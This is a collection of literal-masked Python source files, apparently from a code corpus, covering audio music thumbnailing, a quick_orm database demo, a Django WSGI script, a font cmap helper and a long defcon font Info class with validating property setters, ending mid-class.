<EOL> speakerDiarization ( wavFile , N [ i ] , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , l , PLOT = False ) <EOL> print <EOL> def musicThumbnailing ( x , Fs , shortTermSize = <NUM_LIT:1.0> , shortTermStep = <NUM_LIT:0.5> , thumbnailSize = <NUM_LIT> , Limit1 = <NUM_LIT:0> , Limit2 = <NUM_LIT:1> ) : <EOL> '''<STR_LIT>''' <EOL> x = audioBasicIO . stereo2mono ( x ) ; <EOL> stFeatures = aF . stFeatureExtraction ( x , Fs , Fs * shortTermSize , Fs * shortTermStep ) <EOL> S = selfSimilarityMatrix ( stFeatures ) <EOL> M = int ( round ( thumbnailSize / shortTermStep ) ) <EOL> B = numpy . eye ( M , M ) <EOL> S = scipy . signal . convolve2d ( S , B , '<STR_LIT>' ) <EOL> MIN = numpy . min ( S ) <EOL> for i in range ( S . shape [ <NUM_LIT:0> ] ) : <EOL> for j in range ( S . shape [ <NUM_LIT:1> ] ) : <EOL> if abs ( i - j ) < <NUM_LIT> / shortTermStep or i > j : <EOL> S [ i , j ] = MIN ; <EOL> S [ <NUM_LIT:0> : int ( Limit1 * S . shape [ <NUM_LIT:0> ] ) , : ] = MIN <EOL> S [ : , <NUM_LIT:0> : int ( Limit1 * S . 
shape [ <NUM_LIT:0> ] ) ] = MIN <EOL> S [ int ( Limit2 * S . shape [ <NUM_LIT:0> ] ) : : , : ] = MIN <EOL> S [ : , int ( Limit2 * S . shape [ <NUM_LIT:0> ] ) : : ] = MIN <EOL> maxVal = numpy . max ( S ) <EOL> [ I , J ] = numpy . unravel_index ( S . argmax ( ) , S . shape ) <EOL> i1 = I ; i2 = I <EOL> j1 = J ; j2 = J <EOL> while i2 - i1 < M : <EOL> if i1 <= <NUM_LIT:0> or j1 <= <NUM_LIT:0> or i2 >= S . shape [ <NUM_LIT:0> ] - <NUM_LIT:2> or j2 >= S . shape [ <NUM_LIT:1> ] - <NUM_LIT:2> : <EOL> break <EOL> if S [ i1 - <NUM_LIT:1> , j1 - <NUM_LIT:1> ] > S [ i2 + <NUM_LIT:1> , j2 + <NUM_LIT:1> ] : <EOL> i1 -= <NUM_LIT:1> <EOL> j1 -= <NUM_LIT:1> <EOL> else : <EOL> i2 += <NUM_LIT:1> <EOL> j2 += <NUM_LIT:1> <EOL> return ( shortTermStep * i1 , shortTermStep * i2 , shortTermStep * j1 , shortTermStep * j2 , S ) </s>
<s> from quick_orm . core import Database <EOL> from sqlalchemy import Column , String , Text <EOL> __metaclass__ = Database . DefaultMeta <EOL> class User : <EOL> name = Column ( String ( <NUM_LIT> ) ) <EOL> @ Database . many_to_one ( User ) <EOL> class Post : <EOL> content = Column ( Text ) <EOL> class Question ( Post ) : <EOL> title = Column ( String ( <NUM_LIT> ) ) <EOL> @ Database . many_to_one ( Question ) <EOL> class Answer ( Post ) : <EOL> pass <EOL> @ Database . many_to_one ( Post ) <EOL> class Comment ( Post ) : <EOL> pass <EOL> @ Database . many_to_many ( Post ) <EOL> class Tag : <EOL> name = Column ( String ( <NUM_LIT> ) ) <EOL> Database . register ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> db = Database ( '<STR_LIT>' ) <EOL> db . create_tables ( ) <EOL> user1 = User ( name = '<STR_LIT>' ) <EOL> user2 = User ( name = '<STR_LIT>' ) <EOL> tag1 = Tag ( name = '<STR_LIT>' ) <EOL> tag2 = Tag ( name = '<STR_LIT>' ) <EOL> question = Question ( user = user1 , title = '<STR_LIT>' , content = '<STR_LIT>' , tags = [ tag1 , ] ) <EOL> question2 = Question ( user = user1 , title = '<STR_LIT>' , content = '<STR_LIT>' , tags = [ tag1 , ] ) <EOL> answer = Answer ( user = user1 , question = question , tags = [ tag1 , ] , <EOL> content = '<STR_LIT>' ) <EOL> comment1 = Comment ( user = user2 , content = '<STR_LIT>' , post = question ) <EOL> comment2 = Comment ( user = user2 , content = '<STR_LIT>' , post = answer , tags = [ tag2 , ] ) <EOL> db . session . add_all_then_commit ( [ question , question2 , answer , comment1 , comment2 , tag1 , tag2 , ] ) <EOL> question = db . session . query ( Question ) . get ( <NUM_LIT:1> ) <EOL> print '<STR_LIT>' . format ( question . title , '<STR_LIT:U+002CU+0020>' . join ( tag . name for tag in question . tags ) ) <EOL> print '<STR_LIT>' , question . comments . first ( ) . content <EOL> print '<STR_LIT>' , question . answers . first ( ) . comments . first ( ) . content <EOL> user = db . session . query ( User ) . 
filter_by ( name = '<STR_LIT>' ) . one ( ) <EOL> print '<STR_LIT>' . format ( user . comments . count ( ) ) <EOL> tag = db . session . query ( Tag ) . filter_by ( name = '<STR_LIT>' ) . first ( ) <EOL> print '<STR_LIT>' . format ( tag . questions . count ( ) ) </s>
<s> from os . path import abspath , dirname , join <EOL> import os <EOL> import sys <EOL> sys . stdout = sys . stderr <EOL> sys . path . insert ( <NUM_LIT:0> , abspath ( join ( dirname ( __file__ ) , "<STR_LIT:..>" , "<STR_LIT:..>" ) ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , abspath ( join ( dirname ( __file__ ) , "<STR_LIT:..>" ) ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , abspath ( join ( dirname ( __file__ ) , "<STR_LIT:..>" , "<STR_LIT>" ) ) ) <EOL> os . environ [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> from django . core . handlers . wsgi import WSGIHandler <EOL> application = WSGIHandler ( ) </s>
<s> """<STR_LIT>""" <EOL> def extractCMAP ( ttFont ) : <EOL> return ttFont [ "<STR_LIT>" ] . getcmap ( <NUM_LIT:3> , <NUM_LIT:1> ) . cmap <EOL> def reverseCMAP ( cmap ) : <EOL> reversed = { } <EOL> for value , name in cmap . items ( ) : <EOL> if name not in reversed : <EOL> reversed [ name ] = [ ] <EOL> reversed [ name ] . append ( value ) <EOL> return reversed </s>
<s> from warnings import warn <EOL> from robofab import ufoLib <EOL> from defcon . objects . base import BaseObject <EOL> class Info ( BaseObject ) : <EOL> """<STR_LIT>""" <EOL> changeNotificationName = "<STR_LIT>" <EOL> beginUndoNotificationName = "<STR_LIT>" <EOL> endUndoNotificationName = "<STR_LIT>" <EOL> beginRedoNotificationName = "<STR_LIT>" <EOL> endRedoNotificationName = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> super ( Info , self ) . __init__ ( ) <EOL> self . _ascender = None <EOL> self . _capHeight = None <EOL> self . _copyright = None <EOL> self . _descender = None <EOL> self . _familyName = None <EOL> self . _italicAngle = None <EOL> self . _macintoshFONDFamilyID = None <EOL> self . _macintoshFONDName = None <EOL> self . _note = None <EOL> self . _openTypeHeadCreated = None <EOL> self . _openTypeHeadFlags = None <EOL> self . _openTypeHeadLowestRecPPEM = None <EOL> self . _openTypeHheaAscender = None <EOL> self . _openTypeHheaCaretOffset = None <EOL> self . _openTypeHheaCaretSlopeRise = None <EOL> self . _openTypeHheaCaretSlopeRun = None <EOL> self . _openTypeHheaDescender = None <EOL> self . _openTypeHheaLineGap = None <EOL> self . _openTypeNameCompatibleFullName = None <EOL> self . _openTypeNameDescription = None <EOL> self . _openTypeNameDesigner = None <EOL> self . _openTypeNameDesignerURL = None <EOL> self . _openTypeNameLicense = None <EOL> self . _openTypeNameLicenseURL = None <EOL> self . _openTypeNameManufacturer = None <EOL> self . _openTypeNameManufacturerURL = None <EOL> self . _openTypeNamePreferredFamilyName = None <EOL> self . _openTypeNamePreferredSubfamilyName = None <EOL> self . _openTypeNameSampleText = None <EOL> self . _openTypeNameUniqueID = None <EOL> self . _openTypeNameVersion = None <EOL> self . _openTypeNameWWSFamilyName = None <EOL> self . _openTypeNameWWSSubfamilyName = None <EOL> self . _openTypeOS2CodePageRanges = None <EOL> self . _openTypeOS2FamilyClass = None <EOL> self . _openTypeOS2Panose = None <EOL> self . 
_openTypeOS2Selection = None <EOL> self . _openTypeOS2StrikeoutPosition = None <EOL> self . _openTypeOS2StrikeoutSize = None <EOL> self . _openTypeOS2SubscriptXOffset = None <EOL> self . _openTypeOS2SubscriptXSize = None <EOL> self . _openTypeOS2SubscriptYOffset = None <EOL> self . _openTypeOS2SubscriptYSize = None <EOL> self . _openTypeOS2SuperscriptXOffset = None <EOL> self . _openTypeOS2SuperscriptXSize = None <EOL> self . _openTypeOS2SuperscriptYOffset = None <EOL> self . _openTypeOS2SuperscriptYSize = None <EOL> self . _openTypeOS2Type = None <EOL> self . _openTypeOS2TypoAscender = None <EOL> self . _openTypeOS2TypoDescender = None <EOL> self . _openTypeOS2TypoLineGap = None <EOL> self . _openTypeOS2UnicodeRanges = None <EOL> self . _openTypeOS2VendorID = None <EOL> self . _openTypeOS2WeightClass = None <EOL> self . _openTypeOS2WidthClass = None <EOL> self . _openTypeOS2WinAscent = None <EOL> self . _openTypeOS2WinDescent = None <EOL> self . _openTypeVheaCaretOffset = None <EOL> self . _openTypeVheaCaretSlopeRise = None <EOL> self . _openTypeVheaCaretSlopeRun = None <EOL> self . _openTypeVheaVertTypoAscender = None <EOL> self . _openTypeVheaVertTypoDescender = None <EOL> self . _openTypeVheaVertTypoLineGap = None <EOL> self . _postscriptBlueFuzz = None <EOL> self . _postscriptBlueScale = None <EOL> self . _postscriptBlueShift = None <EOL> self . _postscriptBlueValues = None <EOL> self . _postscriptDefaultCharacter = None <EOL> self . _postscriptDefaultWidthX = None <EOL> self . _postscriptFamilyBlues = None <EOL> self . _postscriptFamilyOtherBlues = None <EOL> self . _postscriptFontName = None <EOL> self . _postscriptForceBold = None <EOL> self . _postscriptFullName = None <EOL> self . _postscriptIsFixedPitch = None <EOL> self . _postscriptNominalWidthX = None <EOL> self . _postscriptOtherBlues = None <EOL> self . _postscriptSlantAngle = None <EOL> self . _postscriptStemSnapH = None <EOL> self . _postscriptStemSnapV = None <EOL> self . 
_postscriptUnderlinePosition = None <EOL> self . _postscriptUnderlineThickness = None <EOL> self . _postscriptUniqueID = None <EOL> self . _postscriptWeightName = None <EOL> self . _postscriptWindowsCharacterSet = None <EOL> self . _styleMapFamilyName = None <EOL> self . _styleMapStyleName = None <EOL> self . _styleName = None <EOL> self . _trademark = None <EOL> self . _unitsPerEm = None <EOL> self . _versionMajor = None <EOL> self . _versionMinor = None <EOL> self . _xHeight = None <EOL> self . _year = None <EOL> def _get_ascender ( self ) : <EOL> return self . _ascender <EOL> def _set_ascender ( self , value ) : <EOL> if value is None : <EOL> self . _ascender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _ascender = value <EOL> self . dirty = True <EOL> ascender = property ( _get_ascender , _set_ascender , doc = "<STR_LIT>" ) <EOL> def _get_capHeight ( self ) : <EOL> return self . _capHeight <EOL> def _set_capHeight ( self , value ) : <EOL> if value is None : <EOL> self . _capHeight = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _capHeight = value <EOL> self . dirty = True <EOL> capHeight = property ( _get_capHeight , _set_capHeight , doc = "<STR_LIT>" ) <EOL> def _get_copyright ( self ) : <EOL> return self . _copyright <EOL> def _set_copyright ( self , value ) : <EOL> if value is None : <EOL> self . _copyright = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _copyright = value <EOL> self . 
dirty = True <EOL> copyright = property ( _get_copyright , _set_copyright , doc = "<STR_LIT>" ) <EOL> def _get_descender ( self ) : <EOL> return self . _descender <EOL> def _set_descender ( self , value ) : <EOL> if value is None : <EOL> self . _descender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _descender = value <EOL> self . dirty = True <EOL> descender = property ( _get_descender , _set_descender , doc = "<STR_LIT>" ) <EOL> def _get_familyName ( self ) : <EOL> return self . _familyName <EOL> def _set_familyName ( self , value ) : <EOL> if value is None : <EOL> self . _familyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _familyName = value <EOL> self . dirty = True <EOL> familyName = property ( _get_familyName , _set_familyName , doc = "<STR_LIT>" ) <EOL> def _get_italicAngle ( self ) : <EOL> return self . _italicAngle <EOL> def _set_italicAngle ( self , value ) : <EOL> if value is None : <EOL> self . _italicAngle = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _italicAngle = value <EOL> self . dirty = True <EOL> italicAngle = property ( _get_italicAngle , _set_italicAngle , doc = "<STR_LIT>" ) <EOL> def _get_macintoshFONDFamilyID ( self ) : <EOL> return self . _macintoshFONDFamilyID <EOL> def _set_macintoshFONDFamilyID ( self , value ) : <EOL> if value is None : <EOL> self . _macintoshFONDFamilyID = None <EOL> else : <EOL> valid = ufoLib . 
validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _macintoshFONDFamilyID = value <EOL> self . dirty = True <EOL> macintoshFONDFamilyID = property ( _get_macintoshFONDFamilyID , _set_macintoshFONDFamilyID , doc = "<STR_LIT>" ) <EOL> def _get_macintoshFONDName ( self ) : <EOL> return self . _macintoshFONDName <EOL> def _set_macintoshFONDName ( self , value ) : <EOL> if value is None : <EOL> self . _macintoshFONDName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _macintoshFONDName = value <EOL> self . dirty = True <EOL> macintoshFONDName = property ( _get_macintoshFONDName , _set_macintoshFONDName , doc = "<STR_LIT>" ) <EOL> def _get_note ( self ) : <EOL> return self . _note <EOL> def _set_note ( self , value ) : <EOL> if value is None : <EOL> self . _note = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _note = value <EOL> self . dirty = True <EOL> note = property ( _get_note , _set_note , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHeadCreated ( self ) : <EOL> return self . _openTypeHeadCreated <EOL> def _set_openTypeHeadCreated ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHeadCreated = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHeadCreated = value <EOL> self . 
dirty = True <EOL> openTypeHeadCreated = property ( _get_openTypeHeadCreated , _set_openTypeHeadCreated , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHeadFlags ( self ) : <EOL> return self . _openTypeHeadFlags <EOL> def _set_openTypeHeadFlags ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHeadFlags = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHeadFlags = value <EOL> self . dirty = True <EOL> openTypeHeadFlags = property ( _get_openTypeHeadFlags , _set_openTypeHeadFlags , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHeadLowestRecPPEM ( self ) : <EOL> return self . _openTypeHeadLowestRecPPEM <EOL> def _set_openTypeHeadLowestRecPPEM ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHeadLowestRecPPEM = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHeadLowestRecPPEM = value <EOL> self . dirty = True <EOL> openTypeHeadLowestRecPPEM = property ( _get_openTypeHeadLowestRecPPEM , _set_openTypeHeadLowestRecPPEM , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaAscender ( self ) : <EOL> return self . _openTypeHheaAscender <EOL> def _set_openTypeHheaAscender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaAscender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaAscender = value <EOL> self . dirty = True <EOL> openTypeHheaAscender = property ( _get_openTypeHheaAscender , _set_openTypeHheaAscender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaCaretOffset ( self ) : <EOL> return self . 
_openTypeHheaCaretOffset <EOL> def _set_openTypeHheaCaretOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaCaretOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaCaretOffset = value <EOL> self . dirty = True <EOL> openTypeHheaCaretOffset = property ( _get_openTypeHheaCaretOffset , _set_openTypeHheaCaretOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaCaretSlopeRise ( self ) : <EOL> return self . _openTypeHheaCaretSlopeRise <EOL> def _set_openTypeHheaCaretSlopeRise ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaCaretSlopeRise = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaCaretSlopeRise = value <EOL> self . dirty = True <EOL> openTypeHheaCaretSlopeRise = property ( _get_openTypeHheaCaretSlopeRise , _set_openTypeHheaCaretSlopeRise , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaCaretSlopeRun ( self ) : <EOL> return self . _openTypeHheaCaretSlopeRun <EOL> def _set_openTypeHheaCaretSlopeRun ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaCaretSlopeRun = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaCaretSlopeRun = value <EOL> self . dirty = True <EOL> openTypeHheaCaretSlopeRun = property ( _get_openTypeHheaCaretSlopeRun , _set_openTypeHheaCaretSlopeRun , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaDescender ( self ) : <EOL> return self . _openTypeHheaDescender <EOL> def _set_openTypeHheaDescender ( self , value ) : <EOL> if value is None : <EOL> self . 
_openTypeHheaDescender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaDescender = value <EOL> self . dirty = True <EOL> openTypeHheaDescender = property ( _get_openTypeHheaDescender , _set_openTypeHheaDescender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaLineGap ( self ) : <EOL> return self . _openTypeHheaLineGap <EOL> def _set_openTypeHheaLineGap ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaLineGap = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaLineGap = value <EOL> self . dirty = True <EOL> openTypeHheaLineGap = property ( _get_openTypeHheaLineGap , _set_openTypeHheaLineGap , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameCompatibleFullName ( self ) : <EOL> return self . _openTypeNameCompatibleFullName <EOL> def _set_openTypeNameCompatibleFullName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameCompatibleFullName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameCompatibleFullName = value <EOL> self . dirty = True <EOL> openTypeNameCompatibleFullName = property ( _get_openTypeNameCompatibleFullName , _set_openTypeNameCompatibleFullName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameDescription ( self ) : <EOL> return self . _openTypeNameDescription <EOL> def _set_openTypeNameDescription ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameDescription = None <EOL> else : <EOL> valid = ufoLib . 
validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameDescription = value <EOL> self . dirty = True <EOL> openTypeNameDescription = property ( _get_openTypeNameDescription , _set_openTypeNameDescription , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameDesigner ( self ) : <EOL> return self . _openTypeNameDesigner <EOL> def _set_openTypeNameDesigner ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameDesigner = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameDesigner = value <EOL> self . dirty = True <EOL> openTypeNameDesigner = property ( _get_openTypeNameDesigner , _set_openTypeNameDesigner , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameDesignerURL ( self ) : <EOL> return self . _openTypeNameDesignerURL <EOL> def _set_openTypeNameDesignerURL ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameDesignerURL = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameDesignerURL = value <EOL> self . dirty = True <EOL> openTypeNameDesignerURL = property ( _get_openTypeNameDesignerURL , _set_openTypeNameDesignerURL , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameLicense ( self ) : <EOL> return self . _openTypeNameLicense <EOL> def _set_openTypeNameLicense ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameLicense = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . 
_openTypeNameLicense = value <EOL> self . dirty = True <EOL> openTypeNameLicense = property ( _get_openTypeNameLicense , _set_openTypeNameLicense , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameLicenseURL ( self ) : <EOL> return self . _openTypeNameLicenseURL <EOL> def _set_openTypeNameLicenseURL ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameLicenseURL = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameLicenseURL = value <EOL> self . dirty = True <EOL> openTypeNameLicenseURL = property ( _get_openTypeNameLicenseURL , _set_openTypeNameLicenseURL , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameManufacturer ( self ) : <EOL> return self . _openTypeNameManufacturer <EOL> def _set_openTypeNameManufacturer ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameManufacturer = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameManufacturer = value <EOL> self . dirty = True <EOL> openTypeNameManufacturer = property ( _get_openTypeNameManufacturer , _set_openTypeNameManufacturer , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameManufacturerURL ( self ) : <EOL> return self . _openTypeNameManufacturerURL <EOL> def _set_openTypeNameManufacturerURL ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameManufacturerURL = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameManufacturerURL = value <EOL> self . 
dirty = True <EOL> openTypeNameManufacturerURL = property ( _get_openTypeNameManufacturerURL , _set_openTypeNameManufacturerURL , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNamePreferredFamilyName ( self ) : <EOL> return self . _openTypeNamePreferredFamilyName <EOL> def _set_openTypeNamePreferredFamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNamePreferredFamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNamePreferredFamilyName = value <EOL> self . dirty = True <EOL> openTypeNamePreferredFamilyName = property ( _get_openTypeNamePreferredFamilyName , _set_openTypeNamePreferredFamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNamePreferredSubfamilyName ( self ) : <EOL> return self . _openTypeNamePreferredSubfamilyName <EOL> def _set_openTypeNamePreferredSubfamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNamePreferredSubfamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNamePreferredSubfamilyName = value <EOL> self . dirty = True <EOL> openTypeNamePreferredSubfamilyName = property ( _get_openTypeNamePreferredSubfamilyName , _set_openTypeNamePreferredSubfamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameSampleText ( self ) : <EOL> return self . _openTypeNameSampleText <EOL> def _set_openTypeNameSampleText ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameSampleText = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameSampleText = value <EOL> self . 
dirty = True <EOL> openTypeNameSampleText = property ( _get_openTypeNameSampleText , _set_openTypeNameSampleText , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameUniqueID ( self ) : <EOL> return self . _openTypeNameUniqueID <EOL> def _set_openTypeNameUniqueID ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameUniqueID = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameUniqueID = value <EOL> self . dirty = True <EOL> openTypeNameUniqueID = property ( _get_openTypeNameUniqueID , _set_openTypeNameUniqueID , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameVersion ( self ) : <EOL> return self . _openTypeNameVersion <EOL> def _set_openTypeNameVersion ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameVersion = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameVersion = value <EOL> self . dirty = True <EOL> openTypeNameVersion = property ( _get_openTypeNameVersion , _set_openTypeNameVersion , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameWWSFamilyName ( self ) : <EOL> return self . _openTypeNameWWSFamilyName <EOL> def _set_openTypeNameWWSFamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameWWSFamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameWWSFamilyName = value <EOL> self . 
